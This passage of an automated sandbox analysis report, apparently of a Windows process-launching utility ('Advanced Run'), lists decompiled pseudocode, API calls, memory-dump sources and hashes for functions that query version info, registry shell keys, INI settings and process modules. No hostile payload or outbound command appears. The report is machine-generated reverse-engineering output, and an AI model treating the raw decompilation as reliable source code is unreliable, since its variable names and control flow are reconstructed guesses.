                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				int _v12;
                                                                                                                				short _v524;
                                                                                                                				char _v1036;
                                                                                                                				void* __edi;
                                                                                                                
                                                                                                                				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                				wcscat( &_v524, _a8);
                                                                                                                				wcscat( &_v524, "\\");
                                                                                                                				wcscat( &_v524, _a12);
                                                                                                                				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t34 =  &_v1036;
                                                                                                                				E00404923(0xff,  &_v1036, _v8);
                                                                                                                				E004049A2(_t34, __esi);
                                                                                                                				return 1;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                				void* _v0;
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				void* _v16;
                                                                                                                				char _v20;
                                                                                                                				char _v24;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t69;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr _t78;
                                                                                                                				void _t89;
                                                                                                                				signed int _t90;
                                                                                                                				int _t98;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t109;
                                                                                                                
                                                                                                                				_t106 = _t105 & 0xfffffff8;
                                                                                                                				E0040B550(0x8874, __ecx);
                                                                                                                				_t98 = 0;
                                                                                                                				_a8 = 0;
                                                                                                                				if(E00404BD3() == 0) {
                                                                                                                					L12:
                                                                                                                					__eflags =  *0x4101b8 - _t98; // 0x0
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_t89 = _a4;
                                                                                                                						_t58 =  *0x40f83c(8, _t89);
                                                                                                                						__eflags = _t58 - 0xffffffff;
                                                                                                                						_v8 = _t58;
                                                                                                                						if(_t58 != 0xffffffff) {
                                                                                                                							_v0 = 1;
                                                                                                                							_a560 = 0x428;
                                                                                                                							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                                							while(1) {
                                                                                                                								__eflags = _t59;
                                                                                                                								if(_t59 == 0) {
                                                                                                                									goto L18;
                                                                                                                								}
                                                                                                                								memset( &_a8, _t98, 0x21c);
                                                                                                                								_a12 = _a580;
                                                                                                                								_a8 = _t89;
                                                                                                                								wcscpy( &_a16,  &_a1096);
                                                                                                                								_a540 = _a576;
                                                                                                                								_t106 = _t106 + 0x14;
                                                                                                                								_a544 = _a572;
                                                                                                                								_a552 = 0x428;
                                                                                                                								_t69 = E00409510(_a8,  &_a8);
                                                                                                                								__eflags = _t69;
                                                                                                                								if(_t69 != 0) {
                                                                                                                									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t109 =  *0x4101bc - _t98; // 0x0
                                                                                                                					if(_t109 == 0) {
                                                                                                                						goto L12;
                                                                                                                					} else {
                                                                                                                						_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                						_v0 = _t72;
                                                                                                                						if(_t72 != 0) {
                                                                                                                							_push( &_a4);
                                                                                                                							_push(0x8000);
                                                                                                                							_push( &_a2160);
                                                                                                                							_push(_t72);
                                                                                                                							if( *0x40f840() != 0) {
                                                                                                                								_t6 =  &_v12;
                                                                                                                								 *_t6 = _v12 >> 2;
                                                                                                                								_v8 = 1;
                                                                                                                								_t90 = 0;
                                                                                                                								if( *_t6 != 0) {
                                                                                                                									while(1) {
                                                                                                                										_a1616 = _t98;
                                                                                                                										memset( &_a1618, _t98, 0x208);
                                                                                                                										memset( &_a8, _t98, 0x21c);
                                                                                                                										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                										_t106 = _t106 + 0x18;
                                                                                                                										_a8 = _a4;
                                                                                                                										_a12 = _t78;
                                                                                                                										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                                										E0040920A( &_v0,  &_a1600);
                                                                                                                										_push(0xc);
                                                                                                                										_push( &_v20);
                                                                                                                										_push(_v4);
                                                                                                                										_push(_v32);
                                                                                                                										if( *0x40f844() != 0) {
                                                                                                                											_a508 = _v32;
                                                                                                                											_a512 = _v36;
                                                                                                                										}
                                                                                                                										if(E00409510(_a8,  &_v24) == 0) {
                                                                                                                											goto L18;
                                                                                                                										}
                                                                                                                										_t90 = _t90 + 1;
                                                                                                                										if(_t90 < _v44) {
                                                                                                                											_t98 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                										}
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L18:
                                                                                                                							CloseHandle(_v16);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _a8;
                                                                                                                			}


























                                                                                                                0x004093ac
                                                                                                                0x004093b4
                                                                                                                0x004093c5
                                                                                                                0x004093c9
                                                                                                                0x004093da
                                                                                                                0x004093df
                                                                                                                0x004093e5
                                                                                                                0x004093e6
                                                                                                                0x004093ea
                                                                                                                0x004093f6
                                                                                                                0x004093fc
                                                                                                                0x00409407
                                                                                                                0x00409407
                                                                                                                0x0040941d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409423
                                                                                                                0x00409428
                                                                                                                0x00409375
                                                                                                                0x00409375
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040942e
                                                                                                                0x00000000
                                                                                                                0x00409428
                                                                                                                0x00409377
                                                                                                                0x0040936d
                                                                                                                0x004094fb
                                                                                                                0x004094ff
                                                                                                                0x004094ff
                                                                                                                0x00409337
                                                                                                                0x0040931c
                                                                                                                0x0040950f

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
                                                                                                                				struct tagRECT _v20;
                                                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                                                
                                                                                                                				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				signed short* _t34;
                                                                                                                				signed int _t37;
                                                                                                                				void* _t40;
                                                                                                                				signed short* _t44;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t40 = __edi;
                                                                                                                				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                                				_t37 = 0;
                                                                                                                				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_v516 = _v516 & 0x00000000;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_t44 =  &_v516;
                                                                                                                						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                                						_t34 = _t44;
                                                                                                                						_push(_t34);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_push(_t34);
                                                                                                                						_push(L"<%s>%s</%s>\r\n");
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t46 = _t46 + 0x24;
                                                                                                                						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						_t37 = _t37 + 1;
                                                                                                                					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				void _v2062;
                                                                                                                				short _v2064;
                                                                                                                				int _t16;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_v2064 = _v2064 & _t16;
                                                                                                                					memset( &_v2062, _t16, 0x7fe);
                                                                                                                					_push(__edi + 0x20a);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2064);
                                                                                                                					L0040B1EC();
                                                                                                                					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                                						_v8 = 1;
                                                                                                                						RegCloseKey(_v16);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                				signed short _v131076;
                                                                                                                
                                                                                                                				_t25 = __esi;
                                                                                                                				E0040B550(0x20000, __ecx);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                                				} else {
                                                                                                                					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                						_push(_a24);
                                                                                                                					} else {
                                                                                                                						_v131076 = _v131076 & 0x00000000;
                                                                                                                						_push(__esi);
                                                                                                                						_push(L"\"%s\"");
                                                                                                                						_push(0xfffe);
                                                                                                                						_push( &_v131076);
                                                                                                                						L0040B1EC();
                                                                                                                						_push(_a24);
                                                                                                                						_push( &_v131076);
                                                                                                                					}
                                                                                                                					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                				}
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				char _v2052;
                                                                                                                				short _v4100;
                                                                                                                				void* __edi;
                                                                                                                				long _t15;
                                                                                                                				long _t16;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				E0040B550(0x1000, __ecx);
                                                                                                                				_t16 = _t15;
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_t16 = GetLastError();
                                                                                                                				}
                                                                                                                				E00404706(_t16,  &_v2052);
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(_t16);
                                                                                                                				_push(L"Error %d: %s");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v4100);
                                                                                                                				L0040B1EC();
                                                                                                                				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t76;
                                                                                                                				signed short _t85;
                                                                                                                				signed int _t87;
                                                                                                                				intOrPtr _t88;
                                                                                                                				signed short _t93;
                                                                                                                				void* _t95;
                                                                                                                				signed int _t124;
                                                                                                                				signed int _t126;
                                                                                                                				signed int _t128;
                                                                                                                				intOrPtr* _t131;
                                                                                                                				signed int _t135;
                                                                                                                				signed int _t137;
                                                                                                                				signed int _t138;
                                                                                                                				void* _t141;
                                                                                                                				void* _t142;
                                                                                                                				void* _t146;
                                                                                                                
                                                                                                                				_t142 = __eflags;
                                                                                                                				_push(_t102);
                                                                                                                				_t131 = __eax;
                                                                                                                				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                                				E00406746(__eax);
                                                                                                                				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                                				_t135 = 5;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                                				_t124 = 0x14;
                                                                                                                				_t74 = _t135 * _t124;
                                                                                                                				 *(_t131 + 0x2d0) = _t135;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                                				L0040B26C();
                                                                                                                				 *(_t131 + 0x2d4) = _t74;
                                                                                                                				_t126 = 0x14;
                                                                                                                				_t76 = _t135 * _t126;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                                				L0040B26C();
                                                                                                                				_t95 = 0x40f008;
                                                                                                                				 *(_t131 + 0x40) = _t76;
                                                                                                                				_v8 = 0x40f008;
                                                                                                                				do {
                                                                                                                					_t137 =  *_t95 * 0x14;
                                                                                                                					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                                					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                                					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                                					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                                					_t141 = _t141 + 0x18;
                                                                                                                					_v12 = _t85;
                                                                                                                					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                                					if((_t85 & 0xffff0000) == 0) {
                                                                                                                						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                                						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                                						_t95 = _v8;
                                                                                                                						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                                					}
                                                                                                                					_t95 = _t95 + 0x28;
                                                                                                                					_t146 = _t95 - 0x40f0d0;
                                                                                                                					_v8 = _t95;
                                                                                                                				} while (_t146 < 0);
                                                                                                                				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                                				_t138 = 5;
                                                                                                                				_t128 = 4;
                                                                                                                				_t87 = _t138 * _t128;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                                				 *(_t131 + 0x2c) = _t138;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                                				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                                				L0040B26C();
                                                                                                                				_push(0xc);
                                                                                                                				 *(_t131 + 0x30) = _t87;
                                                                                                                				L0040B26C();
                                                                                                                				_t139 = _t87;
                                                                                                                				if(_t87 == 0) {
                                                                                                                					_t88 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                                				return E0040686C(_t131);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
